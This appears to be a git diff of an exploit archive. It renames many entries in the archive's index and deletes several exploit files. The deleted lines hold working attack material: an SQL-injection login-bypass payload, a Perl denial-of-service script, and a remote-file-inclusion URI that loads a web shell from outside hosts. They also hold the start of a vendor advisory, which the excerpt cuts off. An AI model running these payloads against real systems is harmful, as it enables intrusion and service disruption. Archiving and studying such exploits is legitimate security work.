diff --git a/files.csv b/files.csv index e75758d65..06f71725b 100755 --- a/files.csv +++ b/files.csv @@ -2001,7 +2001,7 @@ id,file,description,date,author,platform,type,port 2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 2305,platforms/php/webapps/2305.txt,"AnnonceV News Script 1.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 2306,platforms/asp/webapps/2306.txt,"Zix Forum 1.12 - (RepId) SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0 -2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - 'article.php' Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2308,platforms/php/webapps/2308.txt,"C-News 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2309,platforms/php/webapps/2309.txt,"Sponge News 2.2 - (sndir) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 @@ -2018,7 +2018,7 @@ id,file,description,date,author,platform,type,port 2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b - (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b - (dwpage.php) System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Inclusion",2006-09-07,"the master",php,webapps,0 -2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 +2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - 'header.php' Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion",2006-09-07,"Saudi Hackrz",php,webapps,0 @@ -3687,9 +3687,9 @@ id,file,description,date,author,platform,type,port 4032,platforms/tru64/remote/4032.pl,"HP Tru64 - Remote Secure Shell User Enumeration Exploit",2007-06-04,bunker,tru64,remote,0 4033,platforms/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",windows,dos,0 4034,platforms/php/webapps/4034.txt,"Kravchuk letter script 1.0 - (scdir) Remote File Inclusion",2007-06-05,"Mehmet Ince",php,webapps,0 -4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-05,s0cratex,php,webapps,0 +4035,platforms/php/webapps/4035.txt,"Comicsense 0.2 - index.php 'epi' SQL Injection (1)",2007-06-05,s0cratex,php,webapps,0 4036,platforms/php/webapps/4036.php,"PBLang 4.67.16.a - Remote Code Execution Exploit",2007-06-06,Silentz,php,webapps,0 -4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - (index.php epi) SQL Injection",2007-06-06,Silentz,php,webapps,0 +4037,platforms/php/webapps/4037.pl,"Comicsense 0.2 - index.php 'epi' SQL Injection (2)",2007-06-06,Silentz,php,webapps,0 4038,platforms/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,multiple,dos,0 4039,platforms/php/webapps/4039.txt,"WordPress 2.2 - (xmlrpc.php) SQL Injection",2007-06-06,Slappter,php,webapps,0 4040,platforms/asp/webapps/4040.txt,"Kartli Alisveris Sistemi 1.0 - SQL Injection",2007-06-06,kerem125,asp,webapps,0 @@ -4539,14 +4539,14 @@ id,file,description,date,author,platform,type,port 4895,platforms/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",php,webapps,0 4896,platforms/php/webapps/4896.pl,"0DayDB 2.3 - (delete id) Remote Admin Bypass Exploit",2008-01-11,Pr0metheuS,php,webapps,0 4897,platforms/php/webapps/4897.pl,"photokron 1.7 - (update script) Remote Database Disclosure Exploit",2008-01-11,Pr0metheuS,php,webapps,0 -4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-12,ka0x,php,webapps,0 +4898,platforms/php/webapps/4898.txt,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (1)",2008-01-12,ka0x,php,webapps,0 4899,platforms/php/webapps/4899.txt,"TaskFreak! 0.6.1 - SQL Injection",2008-01-12,TheDefaced,php,webapps,0 4900,platforms/asp/webapps/4900.txt,"ASP Photo Gallery 1.0 - Multiple SQL Injections",2008-01-12,trew,asp,webapps,0 4901,platforms/php/webapps/4901.txt,"TutorialCMS 1.02 - (userName) SQL Injection",2008-01-12,ka0x,php,webapps,0 4902,platforms/php/webapps/4902.txt,"minimal Gallery 0.8 - Remote File Disclosure",2008-01-13,Houssamix,php,webapps,0 4903,platforms/windows/remote/4903.html,"NUVICO DVR NVDV4 / PdvrAtl Module (PdvrAtl.DLL 1.0.1.25) - BoF Exploit",2008-01-13,rgod,windows,remote,0 4904,platforms/php/webapps/4904.txt,"Binn SBuilder - (nid) Remote Blind SQL Injection",2008-01-13,JosS,php,webapps,0 -4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection",2008-01-13,Pr0metheuS,php,webapps,0 +4905,platforms/php/webapps/4905.pl,"Agares PhpAutoVideo 2.21 - (articlecat) SQL Injection (2)",2008-01-13,Pr0metheuS,php,webapps,0 4906,platforms/windows/remote/4906.txt,"Quicktime Player 7.3.1.70 - rtsp Remote Buffer Overflow Exploit PoC",2008-01-14,"Luigi Auriemma",windows,remote,0 4907,platforms/php/webapps/4907.py,"X7 Chat 2.0.5 - (day) SQL Injection",2008-01-14,nonroot,php,webapps,0 4908,platforms/php/webapps/4908.pl,"Xforum 1.4 - (topic) SQL Injection",2008-01-14,j0j0,php,webapps,0 @@ -5837,7 +5837,7 @@ id,file,description,date,author,platform,type,port 6226,platforms/php/webapps/6226.txt,"psipuss 1.0 - Multiple SQL Injections",2008-08-10,"Virangar Security",php,webapps,0 6227,platforms/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution Exploit",2008-08-10,"Wojciech Pawlikowski",windows,remote,0 6228,platforms/php/webapps/6228.txt,"OpenImpro 1.1 - (image.php id) SQL Injection",2008-08-10,nuclear,php,webapps,0 -6229,platforms/multiple/remote/6229.txt,"apache tomcat < 6.0.18 utf8 - Directory Traversal",2008-08-11,"Simon Ryeo",multiple,remote,0 +6229,platforms/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (1)",2008-08-11,"Simon Ryeo",multiple,remote,0 6230,platforms/php/webapps/6230.txt,"ZeeBuddy 2.1 - (bannerclick.php adid) SQL Injection",2008-08-11,"Hussin X",php,webapps,0 6231,platforms/php/webapps/6231.txt,"Ppim 1.0 - (upload/change password) Multiple Vulnerabilities",2008-08-11,Stack,php,webapps,0 6232,platforms/php/webapps/6232.txt,"Ovidentia 6.6.5 - (item) SQL Injection",2008-08-11,"Khashayar Fereidani",php,webapps,0 @@ -9367,7 +9367,6 @@ id,file,description,date,author,platform,type,port 9993,platforms/multiple/remote/9993.txt,"Apache mod_perl 'Apache::Status' and 'Apache2::Status' - Cross-site Scripting",2009-11-09,"Richard H. Brain",multiple,remote,0 9994,platforms/multiple/remote/9994.txt,"Apache Tomcat - Cookie Quote Handling Remote Information Disclosure",2009-11-09,"John Kew",multiple,remote,0 9995,platforms/multiple/remote/9995.txt,"Apache Tomcat - Form Authentication Username Enumeration Weakness",2009-11-09,"D. Matscheko",multiple,remote,0 -9996,platforms/php/webapps/9996.txt,"Article Directory - 'index.php' Remote File Inclusion",2009-11-12,mozi,php,webapps,0 9997,platforms/multiple/remote/9997.txt,"Blender 2.49b - (.blend) Remote Command Execution",2009-11-09,"Fernando Russ",multiple,remote,0 9998,platforms/windows/remote/9998.c,"BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow",2009-10-07,"Rafa De Sousa",windows,remote,21 9999,platforms/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Pre-Auth DoS",2009-09-30,"Francis Provencher",windows,dos,21 @@ -9511,7 +9510,6 @@ id,file,description,date,author,platform,type,port 10209,platforms/multiple/webapps/10209.txt,"Everfocus 1.4 - EDSR Remote Authentication Bypass",2009-10-14,"Andrea Fabrizi",multiple,webapps,0 10210,platforms/windows/dos/10210.txt,"Microsoft Internet Explorer 6/7 - CSS Handling Denial of Service",2009-11-20,K4mr4n_st,windows,dos,0 10211,platforms/windows/local/10211.txt,"Autodesk SoftImage Scene TOC - Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 -10212,platforms/windows/local/10212.txt,"Autodesk 3DS - Max Application Callbacks Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10213,platforms/windows/local/10213.txt,"Autodesk Maya Script - Nodes Arbitrary Command Execution",2009-11-23,"Core Security",windows,local,0 10214,platforms/php/webapps/10214.txt,"Joomla Component mygallery - (farbinform_krell) SQL Injection",2009-11-23,"Manas58 BAYBORA",php,webapps,0 10216,platforms/php/webapps/10216.txt,"kr-web 1.1b2 - Remote File Inclusion",2009-11-24,"cr4wl3r ",php,webapps,0 @@ -9769,7 +9767,6 @@ id,file,description,date,author,platform,type,port 10516,platforms/php/webapps/10516.txt,"Jobscript4Web 3.5 - Multiple CSRF",2009-12-17,bi0,php,webapps,0 10517,platforms/php/webapps/10517.txt,"Matrimony Script - Cross-site Request Forgery",2009-12-17,bi0,php,webapps,0 10520,platforms/asp/webapps/10520.txt,"Active Auction House 3.6 - Blind SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 -10521,platforms/asp/webapps/10521.txt,"Active Photo Gallery 6.2 - (Auth Bypass) SQL Injection",2009-12-17,R3d-D3V!L,asp,webapps,0 10522,platforms/php/webapps/10522.txt,"Pre Job Board 1.0 - SQL Bypass",2009-12-17,bi0,php,webapps,0 10523,platforms/php/webapps/10523.txt,"Uploader by CeleronDude 5.3.0 - Shell Upload",2009-12-17,Stink,php,webapps,0 10525,platforms/asp/webapps/10525.txt,"Pre Jobo .NET - SQL Bypass",2009-12-17,bi0,asp,webapps,0 @@ -12347,7 +12344,7 @@ id,file,description,date,author,platform,type,port 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win_x86/shellcode/14014.pl,"Windows XP SP3 SPA - URLDownloadToFileA + CreateProcessA + ExitProcess shellcode (176+ bytes)",2010-06-24,d0lc3,win_x86,shellcode,0 -14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing Script - SQL Injection",2010-06-24,JaMbA,php,webapps,0 +14015,platforms/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - (init.php) Remote File Inclusion",2010-06-24,v3n0m,php,webapps,0 14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna - Local File Inclusion",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 @@ -12393,7 +12390,7 @@ id,file,description,date,author,platform,type,port 14072,platforms/windows/dos/14072.c,"UltraISO 9.3.6.2750 - (.mds) (.mdf) Buffer Overflow PoC",2010-06-27,"fl0 fl0w",windows,dos,0 14074,platforms/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14075,platforms/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 -14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 +14076,platforms/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",php,webapps,0 14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow Exploit (Metasploit)",2010-06-27,blake,windows,local,0 14078,platforms/php/webapps/14078.txt,"Bilder Upload Script - Datei Upload 1.09 - Remote Shell Upload",2010-06-27,Mr.Benladen,php,webapps,0 14079,platforms/php/webapps/14079.txt,"i-netsolution Job Search Engine - SQL Injection",2010-06-27,Sid3^effects,php,webapps,0 @@ -12719,7 +12716,7 @@ id,file,description,date,author,platform,type,port 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post-Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0 14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 -14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 utf8 - Directory Traversal",2010-07-28,mywisdom,unix,remote,0 +14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0 14490,platforms/php/webapps/14490.txt,"nuBuilder - Remote File inclusion",2010-07-28,Ahlspiess,php,webapps,0 14492,platforms/windows/remote/14492.c,"Symantec Ams Intel Alert Handler Service - Design Flaw",2010-07-28,Spider,windows,remote,0 14494,platforms/php/webapps/14494.txt,"AV Arcade 3 - Cookie SQL Injection Authentication Bypass",2010-07-28,saudi0hacker,php,webapps,0 @@ -14776,7 +14773,7 @@ id,file,description,date,author,platform,type,port 16980,platforms/php/webapps/16980.py,"If-CMS 2.07 - Pre-Auth Local File Inclusion Exploit (1)",2011-03-15,TecR0c,php,webapps,0 16982,platforms/php/webapps/16982.txt,"lotuscms 3.0.3 - Multiple Vulnerabilities",2011-03-16,"High-Tech Bridge SA",php,webapps,0 16984,platforms/windows/remote/16984.rb,"HP OpenView Performance Insight Server - Backdoor Account Code Execution",2011-03-15,Metasploit,windows,remote,0 -16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal",2011-03-16,Metasploit,multiple,remote,0 +16985,platforms/multiple/remote/16985.rb,"Adobe ColdFusion - Directory Traversal (Metasploit)",2011-03-16,Metasploit,multiple,remote,0 16986,platforms/windows/dos/16986.py,"AVIPreview 0.26 Alpha - Denial of Service",2011-03-16,BraniX,windows,dos,0 16987,platforms/php/webapps/16987.txt,"pointter php content management system 1.2 - Multiple Vulnerabilities",2011-03-16,LiquidWorm,php,webapps,0 16988,platforms/php/webapps/16988.txt,"WikiWig 5.01 - Multiple XSS Vulnerabilities",2011-03-16,"AutoSec Tools",php,webapps,0 @@ -23387,7 +23384,6 @@ id,file,description,date,author,platform,type,port 26247,platforms/php/webapps/26247.txt,"MyBulletinBoard 1.0 - RateThread.php SQL Injection",2005-09-09,stranger-killer,php,webapps,0 26248,platforms/linux/dos/26248.sh,"Linux Kernel 2.6.x - SCSI ProcFS Denial of Service",2005-09-09,anonymous,linux,dos,0 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0 -26250,platforms/multiple/dos/26250.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-12,"Infam0us Gr0up",multiple,dos,0 26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0 26252,platforms/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.PL Remote Directory Traversal",2005-09-13,h4cky0u,php,webapps,0 26253,platforms/php/webapps/26253.txt,"Land Down Under 800/801 - auth.php m Parameter SQL Injection",2005-09-13,"GroundZero Security Research",php,webapps,0 @@ -31427,7 +31423,7 @@ id,file,description,date,author,platform,type,port 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0 34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0 34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0 -34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 +34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Exploit (Shellshock) (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0 35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 - Multiple SQL Injections",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -34174,8 +34170,8 @@ id,file,description,date,author,platform,type,port 37844,platforms/windows/dos/37844.txt,"Adobe Flash - AVSS.setSubscribedTags Use-After-Free Memory Corruption",2015-08-19,"Google Security Research",windows,dos,0 37845,platforms/windows/dos/37845.txt,"Flash - Uninitialized Stack Variable MPD Parsing Memory Corruption",2015-08-19,bilou,windows,dos,0 37846,platforms/windows/dos/37846.txt,"Flash - Issues in DefineBitsLossless and DefineBitsLossless2 Leads to Using Uninitialized Memory",2015-08-19,bilou,windows,dos,0 -37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 -37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 +37847,platforms/windows/dos/37847.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (1)",2015-08-19,bilou,windows,dos,0 +37848,platforms/windows/dos/37848.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (2)",2015-08-19,bilou,windows,dos,0 37849,platforms/windows/dos/37849.txt,"Adobe Flash - Display List Handling Use-After-Free",2015-08-19,KeenTeam,windows,dos,0 37850,platforms/multiple/dos/37850.txt,"Adobe Flash - NetConnection.connect Use-After-Free",2015-08-19,"Google Security Research",multiple,dos,0 37851,platforms/multiple/remote/37851.txt,"Flash Boundless Tunes - Universal SOP Bypass Through ActionSctipt's Sound Object",2015-08-19,"Google Security Research",multiple,remote,0 @@ -34210,7 +34206,7 @@ id,file,description,date,author,platform,type,port 37880,platforms/lin_x86-64/dos/37880.txt,"Adobe Flash - Heap-Based Buffer Overflow Due to Indexing Error When Loading FLV File",2015-08-19,"Google Security Research",lin_x86-64,dos,0 37881,platforms/win_x86/dos/37881.txt,"Adobe Flash - Shared Object Type Confusion",2015-08-19,"Google Security Research",win_x86,dos,0 37882,platforms/multiple/dos/37882.txt,"Adobe Flash - Overflow in ID3 Tag Parsing",2015-08-19,"Google Security Research",multiple,dos,0 -37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free",2015-08-19,bilou,windows,dos,0 +37883,platforms/windows/dos/37883.txt,"Adobe Flash AS2 - TextField.filters Use-After-Free (3)",2015-08-19,bilou,windows,dos,0 37884,platforms/windows/dos/37884.txt,"Adobe Flash - Heap Use-After-Free in SurfaceFilterList::C​reateFromScriptAtom",2015-08-19,bilou,windows,dos,0 37885,platforms/php/webapps/37885.html,"up.time 7.5.0 - Superadmin Privilege Escalation Exploit",2015-08-19,LiquidWorm,php,webapps,9999 37886,platforms/php/webapps/37886.txt,"up.time 7.5.0 - XSS And CSRF Add Admin Exploit",2015-08-19,LiquidWorm,php,webapps,9999 @@ -36084,7 +36080,7 @@ id,file,description,date,author,platform,type,port 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF (Add Admin Exploit)",2016-06-06,"Ali Ghanbari",php,webapps,80 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 -39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80 +39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Exploit (Shellshock)",2016-06-06,lastc0de,cgi,webapps,80 39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,"Gregory Smiley",windows,local,0 39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF (Change Admin Password)",2016-06-06,"Ali Ghanbari",php,webapps,80 39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 @@ -36358,7 +36354,7 @@ id,file,description,date,author,platform,type,port 40210,platforms/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - (Add Admin) CSRF",2016-08-06,LiquidWorm,php,webapps,80 40211,platforms/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,php,webapps,80 40212,platforms/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection",2016-08-06,LiquidWorm,php,webapps,80 -40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - (ShellShock) Remote Code Execution",2016-08-06,LiquidWorm,cgi,webapps,80 +40213,platforms/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Code Execution (Shellshock)",2016-08-06,LiquidWorm,cgi,webapps,80 40214,platforms/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,php,webapps,80 40215,platforms/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - (strong_user.php) Backdoor Remote Shell Access",2016-08-06,LiquidWorm,php,webapps,80 40216,platforms/jsp/webapps/40216.txt,"Navis WebAccess - SQL Injection",2016-08-08,bRpsd,jsp,webapps,9000 diff --git a/platforms/asp/webapps/10521.txt b/platforms/asp/webapps/10521.txt deleted file mode 100755 index 0d41e085b..000000000 --- a/platforms/asp/webapps/10521.txt +++ /dev/null @@ -1,61 +0,0 @@ -[?] ?????????????????????????{In The Name Of Allah The Mercifull}?????????????????????? -[?] -[~] Tybe: (Auth Bypass) Remote SQL Injection Vulnerability‏ -[?] -[~] Vendor: www.activewebsoftwares.com -[?] -[?] Software: Active Photo Gallery v 6.2 -[?] -[?] author: ((R3d-D3v!L)) -[?] -[?] Date: 17.dec.2009 -[?] T!ME: 10:22 pm -[?] Home: WwW.xP10.ME -[?] -[?] contact: X@hotmail.co.jp -[?]??????????????????????{DEV!L'5 of SYST3M}?????????????????? - - -[?] Exploit: - - - -[?] E-/\/\A!L : x' or ' 1=1 - -[?] password : x' or ' 1=1 - - - -[?]demo: - - -[?]https://server/demoactivephotogallery/account.asp - - - -N073: -REAL RED DEV!L W@S h3r3 LAMERZ - -GAZA !N our hearts ! - - - -[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}----------------------------------------------------- - -[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987 - -[~]70 ِALL ARAB!AN HACKER 3X3PT : LAM3RZ - -[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4 - -[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec)) - -[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA - -[~]spechial FR!ND: 74M3M - -[~] !'M 4R48!4N 3XPL0!73R. - -[~]{[(D!R 4ll 0R D!E)]}; - -[~]-------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/multiple/dos/26250.pl b/platforms/multiple/dos/26250.pl deleted file mode 100755 index 850196b67..000000000 --- a/platforms/multiple/dos/26250.pl +++ /dev/null @@ -1,58 +0,0 @@ -source: http://www.securityfocus.com/bid/14802/info - -COOL! Remote Control is vulnerable to a remote denial of service vulnerability. - -Successful exploitation will permit remote attackers to deny service to legitimate users or cause the client to crash. - -COOL! Remote Control 1.12 is affected by this issue. Other versions may be vulnerable as well. - -#!usr/bin/perl -# -# COOL! Command Execution DOS Exploit -# -------------------------------------------- -# Infam0us Gr0up - Securiti Research -# -# Info: infamous.2hell.com -# Vendor URL: www.yaosoft.com -# -# * If Remote Control(Client application) is running then already connected to server, -# this command exploit will made Remote Control as Client disconnected from server machine. -# But if the Remote Control is not currently connected to Remote Server,then -# by send specified command to Remote Server its allow the server crashed/closed -# - - -$ARGC=@ARGV; -if ($ARGC !=1) { - print "Usage: $0 [host]\n"; - print "Exam: $0 127.0.0.1\n"; - print "\n"; - exit; -} -use Socket; - -my($remote,$port,$iaddr,$paddr,$proto); -$remote=$ARGV[0]; -$popy = "\x31\x31\x39\x38\x30"; - -print "\n[+] Connect to host..\n"; -$iaddr = inet_aton($remote) or die "[-] Error: $!"; -$paddr = sockaddr_in($popy, $iaddr) or die "[-] Error: $!"; -$proto = getprotobyname('tcp') or die "[-] Error: $!"; - -socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!"; -connect(SOCK, $paddr) or die "[-] Error: $!"; - -print "[+] Connected\n"; -print "[+] Send invalid command..\n"; - -$empty = -"\x49\x4e\x46\x41\x4d\x4f\x55\x531". -"\x47\x52\x4f\x55\x50"; - -send(SOCK, $empty, 0) or die "[-] Cannot send query: $!"; -sleep(2); -print "[+] DONE\n"; -print "[+] Check if server crash!\n"; -close(SOCK); -exit; diff --git a/platforms/php/webapps/9996.txt b/platforms/php/webapps/9996.txt deleted file mode 100755 index a93d731b9..000000000 --- a/platforms/php/webapps/9996.txt +++ /dev/null @@ -1,5 +0,0 @@ -An attacker can exploit this issue via a browser. - -The following proof-of-concept URI is available: - -http://www.example.com/index.php?page=http://www.example2.com/r57.txt?http://www.goodayelinks.com/index.php?page=http://www.nykola.ch/Sefirot_r0x/r57.txt? \ No newline at end of file diff --git a/platforms/windows/local/10212.txt b/platforms/windows/local/10212.txt deleted file mode 100755 index fb5902590..000000000 --- a/platforms/windows/local/10212.txt +++ /dev/null @@ -1,214 +0,0 @@ ------BEGIN PGP SIGNED MESSAGE----- -Hash: SHA1 - - Core Security Technologies - CoreLabs Advisory - http://www.coresecurity.com/corelabs/ - -Autodesk 3DS Max Application Callbacks Arbitrary Command Execution - - - -1. *Advisory Information* - -Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution -Advisory Id: CORE-2009-0909 -Advisory URL: -http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution -Date published: 2009-11-23 -Date of last update: 2009-11-20 -Vendors contacted: Autodesk -Release mode: User release - - - -2. *Vulnerability Information* - -Class: Failure to Sanitize Data into a Different Plane [CWE-74] -Impact: Code execution -Remotely Exploitable: Yes -Locally Exploitable: No -Bugtraq ID: 36634 -CVE Name: CVE-2009-3577 - - - -3. *Vulnerability Description* - -Autodesk 3D Studio Max [2] is a modeling, animation and redering -package widely used for video game , film , multimedia and web content -developement. The software provides a built-in scripting language, -allowing users to bind custome code to actions performed in the -applciation. Execution of scripting code does not require explicit -permission from the user. This mechanim can be exploited by an -attacker to execute arbitrary code by enticing a victim to open .max -file with MaxScript application callbacks embedded. - - -4. *Vulnerable packages* - - . Autodesk 3DSMax 2010 - . Autodesk 3DSMax 2009 - . Autodesk 3DSMax 2008 - . Autodesk 3DSMax 9 - . Autodesk 3DSMax 8 - . Autodesk 3DSMax 7 - . Autodesk 3DSMax 6 - - -5. *Vendor Information, Solutions and Workarounds* - -The vendor did not provide fixes or workaround information. - -You can disable the automatic loading of embedded MaxScript by -following these steps: - - . Go to Customize menu > Preferences > Preference Settings dialog > -MAXScript. - . Uncheck "Load/Save Scene Scripts". - . Uncheck "Load/Save Persistent Globals". - - -6. *Credits* - -This vulnerability was discovered and researched by Sebastian Tello -from Core Security Technologies during Bugweek 2009 [1]. - -The publication of this advisory was coordinated by Fernando Russ from -Core Security Advisories Team. - - -7. *Technical Description / Proof of Concept Code* - -Autodesk 3D Studio Max provides built-in scripting language called -MaxScript, which can be used to automate repetitive tasks, combine -existing functionality in new ways, develop new tools and user -interfaces and much more. Max allows users to bind MaxScript to -application callbacks in a way that could be exploited by an attacker -to execute arbitrary code by enticing a victim to open .max file with -MaxScript application callbacks embedded. - -A Proof of 